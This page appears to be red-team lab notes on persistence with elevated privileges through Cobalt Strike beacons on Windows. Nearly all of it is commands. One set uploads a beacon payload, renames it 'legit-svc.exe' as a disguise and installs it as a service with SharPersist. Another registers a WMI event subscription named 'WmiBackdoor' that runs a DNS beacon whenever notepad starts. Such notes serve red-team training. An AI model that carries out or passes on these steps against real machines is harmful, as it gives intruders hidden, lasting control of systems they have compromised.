Elevated

Cobalt: SYSTEM processes cannot authenticate to the web proxy, so we can't use HTTP Beacons. Use P2P or DNS Beacons instead.

Windows Services

Upload and add service

cd C:\Windows
upload C:\Payloads\tcp-local_x64.svc.exe
mv tcp-local_x64.svc.exe legit-svc.exe

execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t service -c "C:\Windows\legit-svc.exe" -n "legit-svc" -m add

WMI Event Subscriptions

When notepad starts execute payload

cd C:\Windows
upload C:\Payloads\dns_x64.exe
powershell-import C:\Tools\PowerLurk.ps1
powershell Register-MaliciousWmiEvent -EventName WmiBackdoor -PermanentCommand "C:\Windows\dns_x64.exe" -Trigger ProcessStart -ProcessName notepad.exe

Get-WmiEvent -Name WmiBackdoor

Revert: Get-WmiEvent -Name WmiBackdoor | Remove-WmiObject

Tooling

https://github.com/Sw4mpf0x/PowerLurk

Last updated 2 years ago